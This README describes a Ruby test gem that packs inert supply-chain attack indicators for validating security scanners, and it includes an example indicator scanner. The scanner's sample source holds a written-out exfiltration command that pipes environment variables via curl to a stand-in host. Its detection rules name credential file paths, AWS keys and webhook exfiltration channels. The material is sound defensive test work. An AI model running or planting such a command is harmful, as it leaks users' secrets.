# commissar-canary

This gem contains obvious indicators of supply chain compromise patterns, intended as a target for testing security scanners. No malicious code executes. Not for production use.
Originally built to validate Commissar detections and provide a shared test target for other RubyGems security scanners. Feel free to use it as much as you need, and share with me your findings or improvements!
## What it contains

Every indicator is a string constant. No code executes on install or require.
| Indicator | Category | Notes |
|---|---|---|
| Telegram bot URL | Suspicious URL | Burned token |
| Discord webhook URL | Suspicious URL | Expired |
| ETH wallet address | Web3 | Lazarus Group / Ronin Bridge hack, OFAC SDN April 2022 |
| BTC wallet address | Web3 | WannaCry ransomware, DOJ indictment 2018 |
| eval call | Dangerous function | Static safe string |
| AWS credential access | Credentials | Static string, no real key |
| AWS credentials path | Credentials | Static string |
| Shell exfil command | Shell/Exfil | Static string |
| Base64 high-entropy string | Encoding | Decodes to inert message |
| Line > 500 characters | Encoding | Repeated inert string |
| Cyrillic homoglyph | Encoding | U+0430 substituting Latin 'a' |
| Native extension reference | Gemspec | Commented out, does not execute |
| `post_install_message` with URL | Gemspec | Points to this repo |
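To show how a scanner turns the table above into findings, here is an added example of a minimal static indicator scanner written in Ruby. It is not Commissar's code and not part of this gem: the regex patterns, the HIGH/MED severities, the score weights, the entropy threshold, and the sample source it scans (every value a constructed, inert placeholder in the spirit of the canary) are all assumptions made for illustration.

```ruby
# Added example (not Commissar's code): a minimal static indicator scanner
# modelled on the canary's indicator table. Patterns, severities, weights
# and the sample source below are constructed assumptions for illustration.
require 'base64'

# Line-oriented indicators: name => [pattern, severity].
INDICATOR_RULES = {
  'Telegram bot URL'           => [%r{api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+}, 'HIGH'],
  'Discord webhook URL'        => [%r{discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_-]+}, 'HIGH'],
  'ETH wallet address'         => [/\b0x[0-9a-fA-F]{40}\b/, 'HIGH'],
  'BTC wallet address'         => [/\b(?:bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34})\b/, 'HIGH'],
  'eval call'                  => [/\beval\s*\(/, 'HIGH'],
  'AWS credential access'      => [/\bAKIA[0-9A-Z]{16}\b/, 'HIGH'], # access key ID shape
  'AWS credentials path'       => [%r{\.aws/credentials}, 'HIGH'],
  'Shell exfil command'        => [/\|\s*curl\b/, 'HIGH'],          # something piped into curl
  'Native extension reference' => [/\bextensions\s*=/, 'MED'],      # flagged even when commented out
}.freeze

# Shannon entropy in bits per character.
def shannon_entropy(str)
  len = str.length.to_f
  str.each_char.tally.values.sum { |c| p = c / len; -p * Math.log2(p) }
end

# A base64 run long enough to hide a payload; it must also decode cleanly.
BASE64_RUN = %r{[A-Za-z0-9+/=]{40,}}
ENTROPY_THRESHOLD = 3.5 # illustrative; real scanners calibrate per token length

# Returns one finding hash per indicator hit: { line:, indicator:, severity:, note: }.
def scan_source(source)
  findings = []
  source.each_line.with_index(1) do |line, no|
    INDICATOR_RULES.each do |name, (pattern, severity)|
      findings << { line: no, indicator: name, severity: severity } if line.match?(pattern)
    end
    findings << { line: no, indicator: 'Line > 500 characters', severity: 'MED' } if line.chomp.length > 500
    findings << { line: no, indicator: 'Cyrillic homoglyph', severity: 'MED' } if line.match?(/\p{Cyrillic}/)
    line.scan(BASE64_RUN).each do |blob|
      decoded = begin
        Base64.strict_decode64(blob)
      rescue ArgumentError
        next # not valid base64 (e.g. a 42-char hex address), skip it
      end
      next if shannon_entropy(blob) < ENTROPY_THRESHOLD
      findings << { line: no, indicator: 'Base64 high-entropy string', severity: 'MED',
                    note: "decodes to: #{decoded.inspect}" }
    end
  end
  findings
end

# Assumed weights (not Commissar's real scoring); capped at 100.
def risk_score(findings)
  weights = { 'HIGH' => 15, 'MED' => 8 }
  [findings.sum { |f| weights.fetch(f[:severity]) }, 100].min
end

# Constructed canary-style source: every indicator is an inert string literal.
SAMPLE_GEM_SOURCE = [
  '# constructed lib file; nothing here is ever executed by the scanner',
  'TELEGRAM = "https://api.telegram.org/bot000000000:PLACEHOLDER-burned-token/sendMessage"',
  'DISCORD  = "https://discord.com/api/webhooks/000000000000000000/PLACEHOLDER-webhook"',
  "ETH      = \"0x#{'0' * 40}\"",                         # zero address, not a real wallet
  'BTC      = "1CanaryCanaryCanaryCanaryCanaryXYZ"',       # base58-shaped placeholder
  'EVAL     = "eval(\'1 + 1\')"',
  'AWS_KEY  = "AKIAIOSFODNN7EXAMPLE"',                     # AWS documentation example key ID
  'AWS_PATH = "~/.aws/credentials"',
  'EXFIL    = "env | curl -T - https://example.invalid/"',
  "B64      = \"#{Base64.strict_encode64('Inert canary payload: nothing executes here, decoded at scan time.' * 2)}\"",
  "LONG     = \"#{'canary ' * 80}\"",                      # 560 characters inside the quotes
  "NAME     = \"c\u0430nary\"",                            # U+0430 Cyrillic a instead of Latin a
  '# spec.extensions = ["ext/canary/extconf.rb"]',
].join("\n")

if __FILE__ == $PROGRAM_NAME
  findings = scan_source(SAMPLE_GEM_SOURCE)
  findings.each { |f| puts format('%-4s line %2d  %s %s', f[:severity], f[:line], f[:indicator], f[:note]) }
  puts "risk score: #{risk_score(findings)}"
end
```

Two details worth noticing: the commented-out `extensions =` line is still reported, because a static scanner cannot tell a comment from live code without parsing, which is exactly why the canary keeps that reference commented; and the zero-filled ETH address also looks like a long base64 run but is rejected before the entropy check because it does not strictly decode, so the two encoding rules do not double-count it.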
## Usage

Run Commissar against it:

```shell
commissar commissar-canary
```

Or locally if you want:

```shell
commissar --local commissar-canary-0.1.0.gem
```

Expected output: multiple HIGH and MED findings across all categories, risk score ≥ 85.
## What it is not

- Does not phone home.
- Does not execute shell commands.
- Does not access credentials or the filesystem.
- Does not compile native extensions.
- Wallet addresses and tokens are burned forensic references from public law enforcement records.
## License

MIT — Mauro Eldritch